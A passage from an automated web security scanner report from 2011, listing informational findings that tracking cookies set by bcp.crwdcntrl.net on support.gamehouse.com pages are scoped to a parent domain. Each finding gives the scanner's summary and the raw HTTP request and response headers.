Cookie: OAID=d11e854ef21d94a451e67c6f9709b415; OACECAP=4150.2; OACAP=13607.1_13606.1; _OACAP[13606]=1; OAAECAP=13607.2; _OAAECAP[13607]=1; _OAAEBLOCK[13607]=1297260544; _OACEBLOCK[4150]=1297260544; _OACECAP[4150]=1; aud=ABR4nC2SSyhEYRiGf2FmmuZy5phzjtiJPcqalQUaSbluKBZ2bhmzGxsWLhsbYeGSkrKTcomowaRsTMpaWE4piSjjfcziPL3%2F%2F37v9%2F1fY4wxCbdzxJiiOn9DLmaSxlhV5u%2FntgqRD1SbYNUIoXvuvrhr4vBRCOeE4D6WV8Fr53BHcAZR20L0h8MBoSyQNunC3bpUnLbBFVJGafRJ2yGQEmJ%2B1dm1WPJS7jgjfeOk3J0SSitwLmOZE%2ByE6iwsVpK2IdQYszyR4uGclvKFcTaSMqy76BJ1%2F6tLANZqT6C6UZOUs12rh%2Bg%2BVD%2FreRfMIgWzdEgJzjOWF5BnIew60itLbJWFMHygXojfCdFmMjco6EKdE33Fa9%2BIzlD3gLpk5cc4bzjMUp7l7pa2aVJmsBwyfDVz8jDnSAgXo8i0M0SfAkZy53FW4twEW7oLRVC79FtjZyykvIPX%2BnimgyphydeCd8bwLNI7IeWAfg1EL6iRt0dmixDk7x27KHx%2BAe2OYQY%3D; cc=ACN4nK2UTyiDYRzHn3cUKextUdPYMA4ceNm7eeO8wyY2yoUYtknJHBRRLMJBOSh%2Fym25yJKDOBgrufgbUgrluovb2o6v9zWkRd%2FfYe%2FleZ%2Ff%2B3m%2B3%2B%2F7%2FGMmryD4mkSLz98geCVLv0UUfFbboNUv2eqlAYsgMuVpK%2B4clltaRxjjhBzxkVdrTKdNHGczdsOYrHb1qZZrWtmWOeUlrrRqP8gOtYkoFYyQwLA2cUhVPKKBfPkozZo3C0RF%2FRoV3KCC69S%2FfqSBusJlquIdFXyggpc00Dg6R1U8o4GeyRnaWnsmZ2kgs%2FHJLRVVS1wayn2hHPNPuTDkjPf%2BNk0V0yE%2BuYaVDPI5Vup%2BT2KoJlKFIYN8haGu6zEcnE8uYqgmYsJ2pdb73C9IKVYorfKRGwt%2Btillpb%2Ba6qcP1uR%2B1jXqQE7vNvdgv7K6CQy58k%2F%2FD%2FUd5ifc36HUgc74OGXpDBhyh7IyksgUnackKsJQ3mwwUwtnb77Ffu2BEwyZoksYcsaHCPtEOMCQrlqi2AUoSiIFasSQh7kx1DGt%2BX1%2B%2F5vxPXzIPcyF7Up2Gghrt19IuQzDGLI3hyj76YWitIuhvuxjDPVLt3gyjZsFGGoPXFAyRQiXirkEQ763UpzJEXvC%2BylvYTVzV30lTu6IveJQBjlKmahait0LtnPEnjH0AUX9WyY%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: image/gif
Set-Cookie: aud=ABR4nCXPPwsBcRjA8UeKS%2B6cv6dsdC%2BA8g5kMJyVjbeAxXaTBbtsbvQCDBKy2CwmszIppUxSrud7y6fn%2BT3%2FTkTEc59DkUi1UQm%2BUhexy774YX6uJK9KZkJ0U1JjJd8n%2BhH1lKyhWF0lvVQKd8WoKYmFkrvQ3qTkTUOcYSeSA9a%2BSG4o%2BShmlOQWdnDgXI%2F2KZUl3lYQMNPiFi4rOKIfi2Im%2F5BXnL1inxn94IgO0RBGVLpU8mbW2TfjbU3fUSm22N4O%2BQPE21a7; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSDE0TLUwNUlNMzJMsTRJNDE1TDUzTzZLszQ3sEwyMTRlAAI%2F1TfF%2F3U2JzEwMBq6KC%2F6DRJjYPffVcTIwMTBwPCfESgBRP67SlAFEiqq0AVq0AWy0AWmoAu0oQoweAh%2Bn83CwHC2geE%2FSEByb%2FF%2FoHMYLYB8RiD%2FC0Q8rSqAsCLvL3EgRRBJBkmIILoiwe9TCZsk8%2F8IYZOi334nrEhrjyphRTL%2FTxNWFHamgLDDBb%2B3EVaktUeBsHWBKjGEFcmaXeSAKgIKKgFpoCRjAVSRJESccRKEj64ZkgwYmYAaGRgl5fTLCdsXwLsPt30we%2BD2YrcPpNH7SwkxUSdDRDAtYqaKixT2NxPjIlHCirjqG6gVJ27W5wjbp7C%2FnbAi%2F%2Fy9hBV5f0knrEjOcAthRcJqlsRYl0%2BMSabEKDImrCiBIZCwoqBqJuT8iysw1xHO5AkMAYStk1ppREQEb%2BAnrMjNehExJeYaYpLKbWKsW01YUTzLbsKKEi3PEQ5M%2BRl8hBX5558kpliVIsbhewgrSr0vS9hNXi%2BuE05PXK2TqFViBKooE3a514s7hB0l838%2FMaGpTYx1twlb5%2FXiFmFFygIORGSX9f%2BJSeTPiPGdAWFFaWpEtIzcrOcTNomv4i21koF%2F%2FgvC9iWdPEVMkZFKWJFiKhGpLj42mrAi7dMqRJQGmRbEWBdBjKJ4woqS%2FYgoDQA8OiC4; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 49
Connection: close

GIF89a...................!.......,...........T..;

13.33. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwk2bdw8DAaCjZl8nFoMPAIKDUwNAAFO8FUzyXwZTgVzDFywymRHdBqD0QJTchvP1gSqwbolIaTPFXQuQWQnhVEA18YIrrMUSDOAMIiCZClPyFaEiAOOI9mGLjhaiEaOAwgmifAab4RMGUyDkwJb4PTAkcB1NCzyBmukH8EAERLIYY9gli0SGIYAnEZRD7xIoghqlCvGIK4a2CmHIATEl4QRzhD6QAq%2BdH4Q%3D%3D; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FadY9%2F%2FesTmdgYDSU7MvkAokxcPjvKmJkYOJgYPjPCJRgYDD331WCKiDwbTeKgGlCRRWqioSKGnSBLHSBKegCbagCDCGC32czMzAoPTb8zwgUOAukQRKSr7%2F%2BB6tQCjuTzQIUB%2FOB4g0MIHlGCyANUv8Fwg9UcWKGK2K0RJXU2mOKWzKtKgBkPIQDtRbD%2BLAzFbhNkPl%2FBJ%2FkaWJcH43bhLAzBTAHMuB0oP%2BuAsLWaO1RwG2N4Pc2Zrg16JKBKjGEjZc1u8gOUvQNHJJKQBooCTdJEiKO0NTTCqIhaQEkoCSnX47beQG8%2Bygy3PtLCb4EIoNbMnARM0U2a%2B2RwG24wv5mfM4SJRzqXPUNFDnPzfoccvaDWQbOhiB5%2F%2Fy9eOUV9rfj9oGb9Vnckt5f0vFJpuGWlDPcgltSWM0Sr4O9v%2BTjlRdWw1NaBFUzYcslwFAF8hWTvxOOL%2F%2F8dYSzs8L%2BN3gKBOEMPAlqAz9hN7hZL8QXZ4twS4b2zMSnczU%2BV1filvTPP0qMq7fjM%2BEwbsl4lt34HFaAWzLR8hzh2kF%2BBh%2FhKA1UkcKb7OJZ9hAOgjDVSsKKUu%2FLEnazwiU84eX14jqyCejWQFI7V%2BskigqeQBUlPIWuijJuScVldYRDQeb%2FfmIqXm28keL14gbu7O714hZuSWUBB3yJ9RmeHLz%2BPzEON8DTpFEjokmjsP8abhP4Kt5SFLf%2B%2BS%2FwRN%2Bsm4Q9mHTyFGFF0W9T8ViTqkzYhPhYPC0v7dMqhPO1fKYF%2Fvrx%2F048BVNsPJ6E8H8rbkkA0QuBNw%3D%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:41 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU32xl4GB0dBFVGUdgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfXx%2FoE44j2YJ1YE5rFKgSnBrxCVOyHamSG8XRCX7YFo6IQI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjTFMJbBfHYAbCghBfESf5AAgAIDzOP; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rd7%2F288kcbAwGjoIqqyDiTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIFZIqLDEJScj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8TWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2QcWPAukQSZI%2Fv8P1ARkKAWqODHDDWG0RNWstccUt2RaVQDIeggHaiKG9WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoGh6QSkAZKwk0CRz%2BaJiDNxHFxGpgPThaMwHSiBGTL6ZfjdmkA7z5q2eP9pQRfcMnglgxcxEwtR2jtkcBtj8L%2BZnwuFCUcLVz1DdRyqZv1OeRcCLMXnBtBZivsb8ftWP%2F8vXg1u1mfxa3Z%2B0s6Psk03JJyhltwSwqrWeJ1k7AanpLD%2B0s%2BXs05J2cCA9IUmFGBXMXk74SjKqiaCVceZACG3zrC%2BT9MOANfWnqDR3IDP2EHulkvxG2Cm%2FUi3JKhPTPx6VyNWzJMuBJfojpKjKu34zPhMG7JeJbd%2BBxWgFsy0fIc4WpFfgYfMUW6FN5kFs%2Byh4jKQ7WSsKLU%2B7KE3axwCU94eb24jmwCNmsYGLhaJ1GrQApUUcJTRKso45ZUXFZHOEBk%2Fu8nrChQRRtv%2FHi9uIE7U3u9uIVbUlnAAV%2B6fYYnM6%2F%2FT4zDDfA0i9SIaBYp7L%2BG2wS%2BirfUimb%2F%2FBd4YnLWTcJ%2BBQAr6yeC; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

13.34. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU30Ry8DAaOgivDqIwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCsIzNY; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIrw6CCTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZOqLDEJcco%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8zWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2Q8WPAukQSZAjAQylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDcyS69WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoBh6QSkAZKwk0COxhNE5Bm4rg4HcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKDkAGxeTvhKMqqJoJVx5kAIbfOsL5P0w4A19aeoNHcgM%2FYQe6WS%2FEbYKb9SLckqE9M%2FHpXI1bMky4El%2BiOkqMq7fjM%2BEwbsl4lt34HFaAWzLR8hzhakV%2BBh8xRboU3mQWz7KHiMpDtZKwotT7soTdrHAJT3h5vbiObAI2axgYuFonUatAClRRwlNEqyjjllRcVkc4QGT%2B7yesKFBFG2%2F8eL24gTtTe724hVtSWcABX7p9hiczr%2F9PjMMN8DSL1IhoFinsv4bbBL6Kt9SKZv%2F8F3hictZNwn4FAEhKFMU%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU33RxcDAaOgiEredwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAAfMjOe; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhK3HSTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIOZLqLDEJccj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KAAzXFWI%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

13.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwU30RwcDAaOgiPEuXwYiBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKXIOYgSNzDFFwZR8glM8X6DmHIIrJLnPZgSKwILCn6FyO2EqGSG8HZBbN8DUdkJEdwP4XVDVEpDBBdC%2FMAHcQvESWLiYJVC1yC%2BhdjHxgvmSNyHOFAUTInvA1MCx8GU0DMIVQyhSiBKVMHaeU0hvFUQVx8AC0p4Qaz1BxIAv7IubQ%3D%3D; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1RcR%2FzeeOM3AwGjoIjxLFyTGwCvwvY2JgUGSgeE%2FiOsJpBkZGIEMIGb031XEyMDEcXH6fxCvgeGY%2F64SVAGBb7tRBG4J%2FNDHaZzAD208cuq45b5dxSmXUFGF6qKEihp0gSxUAWFVJzzGTUFVzOAbdiabhYHh7N5msHLJBqA2oHoLIM0IVPMFwhf8PpuZgUFpy36w4FkgDTISYgeQoRSo4sQMN4TRElWz1h5T3JJpVQEg6yEcmKvRrQ87U4HbBJn%2FR%2FBJnibsO%2F9dBYQVhZ0pgDmUAadDA1Wi8YWDAm5Jwe9tzHDj0SUDVWIIO1DW7CIHSFELOCSVgDRQEm4S2MFomhhhaYERmk4YgQlHCciW0y%2FH7dIA3n3Ussf7Swm%2B4JLBLRm4iJlajtDaI4HbHoX9zfhcKEo4WrjqG6jlUjfrc8i5EGYvODeCzFbY347bsf75e%2FFqdrM%2Bi1uz95d0fJJpuCXlDLfglhRWs8TrJmE1PCWH95d8vJoVk78Tjp2gaiZc2Y4BGGTrCGf5MOEMfMnnDR7JDfyEHehmvRC3CW7Wi3BLhvbMxKdzNW7JMOFKfOnoKDGu3o7PhMO4JeNZduNzWAFuyUTLc4RrEvkZfMSU4lJ4U1Y8yx4i6gvVSsKKUu%2FLEnazwiU84eX14jqyCdisYWDgap1ErTIoUEUJT6msooxbUnFZHeEAkfm%2Fn7CiQBVtvPHj9eIG7kzt9eIWbkllAQd86fYZnsy8%2Fj8xDjfA0xJSI6IlpLD%2FGm4T%2BCreUiua%2FfNf4InJWTcJ%2BzXp5CnCiqLfpuK2BgBk%2BzD3; OAID=aa8272d1805895ab786afc266fb574e9

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU30Ry8DAaOgivLqBwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAD3BjOG; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIry6ASTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZJqLDEJcck%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KANnJFP8%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

13.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU33RxcDAaOgiEtfAYM3AIKDEAAa9YJLnMoS6Cab4KxsYGhgYmNdAeFVgnmgimCeaABH8C6Y4jMCU2GMwxTUDrFK8AMwTOQdR6Qam%2BMIgKj%2BBKd5vEF4lxMxDYH28fyCOeA%2FmiRWBeaxSYErwK0TlToh2ZghvF8RleyAaOiGC%2ByG8bohKaYjgQojRfGBKoBDiXIirxcTBGoSuQQIEYjsbL5gjcR9CBYIpSScI5QjxkSiYEt8HMfM4mBJ6BqGKIUZvgfBKICpVId40hfBWQTx2ACwo4QVxkj%2BQAADFoDNn; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhLXABJj4BH43sbEwCDJwPAfxPUE0owMjEAGEPMmVFjikuOWfm6KU07ghz5OMwV%2BaOOW%2B3YFt5nfruIxUx2PH0LwmHkKp1xCRSpOOWFVJ5z2MfiEnclmYWA4u7cZLCvZAFQFlLYA0oxABV8gfMHvs5kZGJS27AcLngXSIBMgRgIZSoEqTsxwQxgtUTVr7THFLZlWFQCyHsKBORLd%2BrAzFbhNkPl%2FBJ%2FkacK%2B899VQFhR2JkCmEMZcDo0UCUaXzgo4JYU%2FN7GDDceXTJQJYawA2XNLnKAFLWAQ1IJSAMl4SaBHYymCUgzcVycDuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcEXXDK4JQMXMVPLEVp7JHDbo7C%2FGZ8LRQlHC1d9A7Vc6mZ9DjkXwuwF50aQ2Qr723E71j9%2FL17NbtZncWv2%2FpKOTzINt6Sc4RbcksJqlnjdJKyGp%2BTw%2FpKPV3POyZnAgDQFByCDYvJ3wlEVVM2EKw8yAMNvHeH8HyacgS8tvcEjuYGfsAPdrBfiNsHNehFuydCemfh0rsYtGSZciS9RHSXG1dvxmXAYt2Q8y258DivALZloeY5wtSI%2Fg4%2BYIl0KbzKLZ9lDROWhWklYUep9WcJuVriEJ7y8XlxHNgGbNQwMXK2TqFUgBaoo4SmiVZRxSyouqyMcIDL%2F9xNWFKiijTd%2BvF7cwJ2pvV7cwi2pLOCAL90%2Bw5OZ1%2F8nxuEGeJpFakQ0ixT2X8NtAl%2FFW2pFs3%2F%2BCzwxOesmYb8CABGbFR8%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
